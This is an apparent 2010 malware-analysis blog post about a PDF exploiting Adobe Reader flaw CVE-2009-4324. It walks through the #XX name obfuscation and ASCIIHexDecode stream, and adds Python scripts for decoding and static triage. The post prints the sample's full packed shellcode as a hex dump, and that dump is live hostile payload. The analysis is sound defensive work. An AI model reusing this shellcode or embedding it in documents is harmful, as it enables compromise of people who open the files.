Tuesday, January 12, 2010

Adobe CVE-2009-4324 – Another one with AsciiHexDecode waiting for the patch day

Many thanks to contagiodump for the following PDF:

http://contagiodump.blogspot.com/2010/01/jan-7-us-j-indiastrategicdialogue-from.html

In the document above, the following (not so rare) method for obfuscating the PDF directives was found:

[screenshot sshot001: the obfuscated PDF directives]

Adobe Reader evaluates each #<value> sequence as the ASCII character with that hexadecimal code, so the snippet above becomes the following:

[screenshot sshot002: the same directives with the #<value> escapes resolved]

To decode the stream, pdf-parser.py was used and the object was redirected into clearObjects:

[screenshot sshot003: pdf-parser.py output]
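The two steps above, resolving the #XX escapes in PDF names and decoding an ASCIIHexDecode stream, are easy to script. The following is an added example (not code from the post, and not pdf-parser.py): it normalizes escaped names so that keywords such as /JavaScript or /OpenAction can be matched, and decodes the body of any stream whose dictionary names the ASCIIHexDecode filter, including the odd-trailing-digit padding and the `>` end-of-data marker. The embedded SAMPLE_PDF is a constructed fragment, not the document analyzed in the post, and the stream-matching regex is a deliberate simplification that does not handle nested dictionaries.

```python
"""Normalize #XX-escaped PDF names and decode ASCIIHexDecode streams (added example)."""
import re

# A name token: '/' followed by regular characters (no whitespace or delimiters).
# Inside it, #XX (two hex digits) stands for the byte with that code.
NAME_RE = re.compile(rb'/([^\s/\[\]<>(){}%]*)')
HEX_ESCAPE_RE = re.compile(rb'#([0-9A-Fa-f]{2})')
# Dictionary immediately followed by a stream body (simplified: no nested << >>).
STREAM_RE = re.compile(rb'(<<(?:(?!>>).)*>>)\s*stream\r?\n(.*?)\r?\nendstream', re.DOTALL)

# Names worth flagging once the escapes are removed (assumed triage list).
SUSPICIOUS_NAMES = {b'JavaScript', b'JS', b'OpenAction', b'AA', b'Launch',
                    b'ASCIIHexDecode', b'EmbeddedFile'}


def unescape_pdf_name(raw: bytes) -> bytes:
    """Replace every #XX escape in a name token with the byte it encodes."""
    return HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)


def normalize_names(data: bytes) -> bytes:
    """Rewrite all name tokens in a chunk of PDF syntax to their unescaped form."""
    return NAME_RE.sub(lambda m: b'/' + unescape_pdf_name(m.group(1)), data)


def ascii_hex_decode(data: bytes) -> bytes:
    """ASCIIHexDecode filter: pairs of hex digits, whitespace ignored,
    '>' is end-of-data, and an odd trailing digit is padded with 0."""
    end = data.find(b'>')
    if end != -1:
        data = data[:end]
    digits = re.sub(rb'\s+', b'', data)
    if not re.fullmatch(rb'[0-9A-Fa-f]*', digits):
        raise ValueError('non-hex character in ASCIIHexDecode data')
    if len(digits) % 2:
        digits += b'0'
    return bytes.fromhex(digits.decode('ascii'))


def find_obfuscated_names(pdf: bytes):
    """Return (escaped, decoded, suspicious) for every name that uses #XX escapes."""
    hits = []
    for m in NAME_RE.finditer(pdf):
        raw = m.group(1)
        if b'#' in raw:
            clean = unescape_pdf_name(raw)
            hits.append((raw.decode('latin-1'), clean.decode('latin-1'),
                         clean in SUSPICIOUS_NAMES))
    return hits


def decode_ascii_hex_streams(pdf: bytes):
    """Decode every stream whose (normalized) dictionary names the ASCIIHexDecode filter."""
    out = []
    for m in STREAM_RE.finditer(pdf):
        if b'/ASCIIHexDecode' in normalize_names(m.group(1)):
            out.append(ascii_hex_decode(m.group(2)))
    return out


# Constructed sample (not the PDF from the post): three objects with escaped names
# and one hex-encoded stream whose body is the harmless text "var s = 'ok';".
SAMPLE_PDF = (
    b"1 0 obj\n<< /Type /Catalog /#4fpenAction 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /S /#4a#61#76#61Script /JS 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Filter /#41SCIIHexDecode >>\nstream\n"
    b"76617220 7320 3d 20 27 6f 6b 27 3b\n>\nendstream\nendobj\n"
)

if __name__ == '__main__':
    for escaped, decoded, bad in find_obfuscated_names(SAMPLE_PDF):
        print(f"/{escaped} -> /{decoded}{'  [suspicious]' if bad else ''}")
    for body in decode_ascii_hex_streams(SAMPLE_PDF):
        print('decoded stream:', body)
```

Running it on a real file means passing the file's bytes to the two functions; the point of normalizing first is that a signature looking for the literal string `/JavaScript` never sees `/#4a#61#76#61Script`, while a check made after normalization does.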

At first look, an interesting decoded stream appears as in the following screenshot:

[screenshot sshot004: the decoded stream]

As already well documented on other web sites and forums, the code is ready to be analyzed with tools such as Malzilla. So:

[screenshot sshot005: the code loaded in Malzilla]
[screenshot sshot006: Malzilla output]

The packed shellcode appears to be the following:

414141414141e801000000008b0c2483c4048d49124180316780399075f70d450f6
74b67670f677b67670f677767670f648067670f454b67670d670f42746667339b0f
f45583f30fa3ea78130fd55168740f30016a980f3648c5660f5e851ae40fe8957f0
60f24d9cbbc0f8ac898d30fce45fec60fe9746dcb0ffce0ec82ec93ea19b754bcd0
634c843354b503ec3d57ec2c6bec2e7bec6eec0e6fca5af45583f3126707ec225be
c2b621f64aaec3e4764ba549820ec53dc6492fe68d9615da3136fa6ad6064b7218c
965c33437b1283ec3e4364ba01ec5b1cec3e7b64ba644bdcf238cc30065af45583f
312c9e68b676f6767ec8bec209be4a762ee209bec208be4a762ee208b0d679830b7
54ae54bce75f5d12662426e75b6f5d129e24e49c6512942e64a6eee26766676754a
e26e75b6f45129ea1636f670d670fe76767670d640d670d640f676767e7ecd26766
6767318f676767673fe4a76a3732ec8bec209b9887ee2053320f6766676798308fe
ad267666767310d670d67329830bf0d670d670d650d670d670f67676727318f6767
67673fe4a76a3732ec8bec209b9887e49f6768e90b656767eee267616767ec3823e
c10530d670d673431983087ec382fa0e263616767676367670d67eae26760676737
0f67636767eae26765676737ec105331983093eca44a67636767e49f671861eefa6
361676754aeead36a67656767cb55a6a7af64e09deadb6a67656767cde09d265cea
6361676712b90d67eae2636067673798d263616767eae2676567673798d26761676
798309fe68c67636767e49c6718e398d2676167679830970d67ead267666767318f
676767673fe4a76a3732ec8bec208b98870d670d6798102b9810539830870d67eae
26760676737981037eae2676667673798105398309354a727e71b626767129fec28
37e09cea1b6267ead26766676794c3e09c0d670d670d650d670d670f67676727328
f676767673fe4a76a3732ec8bec209b9887e49f6768e95b666767eee267616767ec
385bec10530d670d673431983087ec3827a0e263616767676367670d67eae267606
767370f67636767eae2676567673731983093eca44a67636767e49f671861eefa63
6167670d67eae2636067673798d263616767eae2676567673798d26761676798309
fe68c67636767e49c6718cc98d267616767983097ead2676667670f67666767310d
679830bba1e2986767674554ae26e7db6a67666767671292a0e36a6766676745474
814e4a66301a0e36a676667674745e4a665e09c54b5ea137267cbeadb6a67666767
cd26255b67128a2ea1e36a6766676745a0e28c676767242a2349a0e288676767223
f224701a0e2946767674804a1e29267676747a0e2916767671306140ca0e29d6767
670b0e1413a1e29967676741e09ceae28c6767670d67378f676767673fe4a76a373
2ec8bec208b98870d670d98983083f7f7f7f7f7f7f70000
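Before handing a blob like the one above to a debugger, a few static checks already say a lot. The following is an added example, not a tool from the post: it reassembles a line-wrapped hex dump into bytes, computes the hashes you would look up in VirusTotal or ThreatExpert, reports the most frequent byte values (a single dominant value is a common sign of a one-byte XOR packer, since the zero bytes of the original all turn into the key), finds the longest run of typical sled bytes, and lists `call rel32` instructions with a tiny forward displacement, the GetPC idiom that decoder stubs use to find their own data. SAMPLE_DUMP is a constructed input; to run it on the dump above, save the dump to a file and pass the path as the first argument.

```python
"""Static triage of a hex dump of packed shellcode (added example)."""
import hashlib
import re
import sys
from collections import Counter

# Single-byte instructions commonly used as sled filler on x86-32:
# 0x90 nop, 0x40-0x4f inc/dec reg.
SLED_BYTES = {0x90} | set(range(0x40, 0x50))


def reassemble_hex_dump(text: str) -> bytes:
    """Join a line-wrapped hex dump (as pasted from a post) into raw bytes."""
    digits = re.sub(r'\s+', '', text)
    if not re.fullmatch(r'[0-9A-Fa-f]*', digits) or len(digits) % 2:
        raise ValueError('dump is not an even-length string of hex digits')
    return bytes.fromhex(digits)


def hashes(buf: bytes) -> dict:
    """MD5 and SHA-256 of the blob, for looking it up in online scanners."""
    return {'md5': hashlib.md5(buf).hexdigest(),
            'sha256': hashlib.sha256(buf).hexdigest()}


def top_bytes(buf: bytes, n: int = 3):
    """Most frequent byte values as (value, count), highest first."""
    return Counter(buf).most_common(n)


def longest_sled_run(buf: bytes):
    """Longest run of identical sled bytes as (offset, byte, length)."""
    best = (0, None, 0)
    i = 0
    while i < len(buf):
        j = i
        while j < len(buf) and buf[j] == buf[i]:
            j += 1
        if buf[i] in SLED_BYTES and j - i > best[2]:
            best = (i, buf[i], j - i)
        i = j
    return best


def find_getpc_calls(buf: bytes, max_disp: int = 16):
    """Offsets of 'e8 xx 00 00 00' (call with a small forward displacement),
    returned as (offset, displacement)."""
    hits = []
    for i in range(len(buf) - 4):
        if buf[i] == 0xE8:
            disp = int.from_bytes(buf[i + 1:i + 5], 'little')
            if disp <= max_disp:
                hits.append((i, disp))
    return hits


def triage(text: str) -> dict:
    """Run every check on a hex dump and return the findings."""
    buf = reassemble_hex_dump(text)
    return {'size': len(buf), **hashes(buf), 'top_bytes': top_bytes(buf),
            'sled': longest_sled_run(buf), 'getpc': find_getpc_calls(buf)}


# Constructed sample: five 'inc ecx' sled bytes, a GetPC call, pop ebx, two nops.
SAMPLE_DUMP = "4141414141e8000000005b9090\n"

if __name__ == '__main__':
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for key, value in triage(text).items():
        print(key, value)
```

The hashes are of the shellcode fragment only, not of the PDF, so they will not match the identifiers in the VirusTotal and ThreatExpert links below; they are useful for correlating the same payload across different carrier documents.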

The VirusTotal response:

http://www.virustotal.com/analisis/6b11d73965e62de381f2ea9b2f3de4fdbf461e970fee8cb4b90e7a62f88c2aa0-1263296898

The ThreatExpert response:
http://www.threatexpert.com/report.aspx?md5=88a653e2d85649e0b4ae48a1dd711f5e

At first sight, the shellcode needs to be launched in the Adobe Reader process context.
